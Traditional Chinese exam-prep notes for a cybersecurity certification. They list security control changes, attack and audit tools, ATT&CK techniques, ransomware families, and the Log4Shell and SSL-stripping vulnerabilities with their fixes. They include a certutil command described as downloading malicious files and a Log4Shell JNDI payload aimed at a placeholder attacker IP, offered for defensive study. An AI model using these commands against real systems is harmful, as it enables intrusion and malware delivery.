本次修法把許多中級的下放到普級。也有少部份高下放到中、新增項目等等。
| 防護等級 | 構面 | 控制措施 | 變更內容(新增 / 刪除 / 調整) |
| 🟢 普級 | 存取控制 | 帳號管理 | 已逾期之臨時或緊急帳號應刪除或禁用 |
| 🟢 普級 | 存取控制 | 帳號管理 | 資通系統閒置帳號應禁用 |
| 🟢 普級 | 存取控制 | 帳號管理 | 定期審核資通系統帳號之申請、建立、修改、啟用、停用及刪除 |
| 🟢 普級 | 存取控制 | 最小權限 | 採最小權限原則,僅允許使用者(或代表使用者行為之程序)依機關任務及業務功能,完成指派任務所需之授權存取 |
| 🟢 普級 | 存取控制 | 遠端存取 | 遠端存取之來源應為機關已預先定義及管理之存取控制點 |
| 🟢 普級 | 事件日誌與可歸責性 | 時戳及校時 | 系統內部時鐘應定期與基準時間源進行同步 |
| 🟢 普級 | 營運持續計畫 | 系統備援 | 訂定資通系統從中斷後至重新恢復服務之最大可容忍中斷時間要求 |
| 🟢 普級 | 系統與服務獲得 | 獲得程序 | 識別資通系統使用之第三方軟體、服務、函式庫或其他元件 |
| 🟢 普級 | 系統與資訊完整性 | 軟體及資訊完整性 | 使用者輸入資料合法性檢查應置放於應用系統伺服器端 |
規劃 & 防護 雙科|110–114 年考古題|共 46 個軟體工具
使用情境:Wi-Fi 密碼破解稽核、無線網路安全評估、紅隊演練無線攻擊
Proxy:攔截 / 修改 HTTP 請求 Scanner:自動弱點掃描 Intruder:自動化攻擊(暴力破解、模糊測試) Repeater:重放並修改請求
合法使用:紅隊演練、APT 戰術模擬 Beacon:後門元件,支援 Shellcode 注入、橫向移動、資料外洩
Dictionary Attack:字典攻擊 Brute Force Attack:暴力破解 Mask Attack Mode:遮罩攻擊(考古題考點) Rule-based Attack:規則型攻擊 支援格式:MD5、SHA256、NTLM、bcrypt 等
使用情境:登入帳號暴力破解、密碼噴灑攻擊(Password Spraying)測試
使用情境:密碼雜湊值破解(MD5、SHA1、DES 等)、帳號安全稽核
使用情境:無線 AP 掃描監控、Rogue AP(惡意 AP)偵測、無線流量分析
使用情境:漏洞利用測試、後滲透行動(Post-exploitation)、紅隊演練、弱點驗證
-sS:TCP SYN 半開放掃描(最常用、最隱蔽) -sU:UDP 埠掃描 -sV:服務版本偵測 -O:作業系統偵測(注意:非 -sO) -sO:IP 協定掃描(≠ 作業系統偵測) -T0~T5:掃描速度(T1 最慢最隱蔽,T4 積極快速,T5 最快) -D:誘騙掃描(Decoy Scan,偽裝多個來源 IP 混淆防禦方) -A:全面掃描(OS + 版本 + 腳本)
使用情境:Web 應用程式 SQL 注入自動化測試、資料庫內容枚舉
使用情境:攻擊面管理(ASM)、資產發現、滲透測試偵察
搜尋對象:暴露的伺服器、IoT 設備、特定漏洞版本軟體、ICS/SCADA 工控系統 合法用途:資產盤點、攻擊面識別、滲透測試偵察階段
使用情境:暴露資產搜尋、特定軟硬體版本偵測
使用情境:OWASP Top 10 安全測試、系統上線前安全驗證、CI/CD 整合掃描
使用情境:主機 / 網路弱點掃描、CVE 漏洞識別 版本:Nessus Professional(商業授權) 合規:PCI DSS、CIS Benchmark 等
使用情境:弱點掃描與風險評分、修補優先序排定、合規評估
使用情境:OWASP Top 10 掃描、HTTP 代理攔截分析、Web 滲透測試 與 Fortify 差異:ZAP → 動態分析(執行中程式);Fortify → 靜態分析(原始碼)
使用情境:網路弱點掃描、CVE 識別、開放埠與服務偵測
使用情境:OWASP Top 10 測試、大型企業 Web 應用程式安全驗證
使用情境:原始碼安全分析、DevSecOps 整合、開發階段安全左移(Shift Left)
使用情境:白箱源碼安全分析、SSDLC 開發階段測試、DevSecOps 整合 ❗分析「原始碼」,無法直接分析已編譯的執行檔
使用情境:惡意程式(Malware)逆向分析、二進位漏洞研究、軟體逆向工程
使用情境:靜態應用程式安全測試(SAST)、DevSecOps 整合 支援語言:Java、Python、JavaScript、C# 等
ATT&CK:T1087 Account Discovery 使用情境(惡意):取得 AD 內部架構,為橫向移動尋找目標帳號
ATT&CK:T1197 BITS Jobs(防禦規避 + 持久化)
功能:憑證噴灑(Password Spraying)、橫向移動、AD 枚舉、遠端執行命令
certutil -urlcache -split -f [URL]:下載惡意檔案 certutil -decode:Base64 解碼(解包 Payload) ATT&CK:T1105 Ingress Tool Transfer
惡意用途:後滲透建立通訊隧道、將內網流量轉發到外部 C2 考題情境:在網站 Web Root 目錄發現 Lcx.exe → 確認為遭入侵的入侵指標(IoC)
ATT&CK:T1003 OS Credential Dumping Pass-the-Hash 攻擊工具 Kerberos Golden Ticket / Silver Ticket 偽造
Bind Shell:監聽特定埠等待連入 Reverse Shell:主動連回攻擊者控制的伺服器 別名:NetCat、nc
ATT&CK:T1003.003 NTDS 惡意使用:取得所有 AD 帳號的 NTLM 雜湊,再配合 Pass-the-Hash 或 Hashcat 破解
惡意使用:無檔案攻擊(Fileless Attack)、繞過防毒偵測、橫向移動 ExecutionPolicy:PowerShell 執行政策(可被攻擊者繞過)
ATT&CK:T1135 Network Share Discovery 使用情境:枚舉 SMB 共享目錄、偵察內網敏感路徑
傳播途徑:網路釣魚郵件、惡意廣告(Malvertising)
常用工具:Cobalt Strike 特徵:雙重勒索、針對關鍵基礎設施
特徵:雙重勒索策略、針對製造業 / 醫療機構
特徵:針對 Linux 伺服器、偽裝成合法 SSH 服務、竊取所有透過 SSH 登入的憑證
特徵:速度最快的勒索軟體之一、自動化 AD 橫向移動、多版本(LockBit 2.0、3.0)
特徵:針對 macOS 系統、商業化 MaaS 模式提供
惡意使用:竊取資料後上傳 MEGA 雲端,因使用合法雲端服務而繞過傳統 DLP
入侵管道:釣魚郵件、RDP 弱密碼暴力破解
特徵:雙重勒索(Double Extortion)、供應鏈攻擊、針對企業與政府
RansomEXX:Linux/Windows 雙平台、針對政府機構 ProLock:透過釣魚郵件或 RDP 弱密碼入侵
特徵:建立加密隧道、持久化 C2 連線、資料外洩管道
觸發機制:JNDI Lookup 注入(攻擊者在日誌輸入中植入 ${jndi:ldap://攻擊者IP})
修補方式:
✔ 升級至 Log4j 2.17.1+(Java 8)
✔ 設定 log4j2.formatMsgNoLookups=true
✔ 刪除 JndiLookup.class
✘ 僅更新防火牆規則(不足)
攻擊原理:攔截 HTTP → HTTPS 的 301/302 重導向,讓受害者以 HTTP 與攻擊者通訊 防禦機制: HSTS(HTTP Strict Transport Security) HSTS Preloading(預載入清單)